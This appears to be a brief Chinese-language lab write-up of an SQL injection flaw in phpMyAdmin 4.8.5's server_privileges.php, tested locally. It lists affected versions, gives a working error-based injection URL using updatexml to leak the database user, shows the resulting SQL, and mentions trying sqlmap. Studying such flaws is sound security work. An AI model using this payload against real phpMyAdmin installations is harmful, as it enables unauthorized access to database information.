影响范围
    4<4.9.4 and 5>5.0.1
    这里我使用的phpstudy自带的phpMyadmin4.8.5
    首先需要登陆系统
    口令随意
    然后是poc

    1. http://127.0.0.1/phpMyAdmin4.8.5/server_privileges.php?ajax_request=true&validate_username=true&username=111' and(select%20updatexml(1,concat(0x7e,(SELECT%20user()),0x7e),1))%20--%20

    这里我使用的mysql监控工具,查看sql语句的拼接情况,比较直观
    拼接
    SELECT FROM mysql.user WHERE User = ‘111*’ and(select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)) —
    标红为恶意代码
    image.png
    抓个包,使用sqlmap跑跑看看
    image.png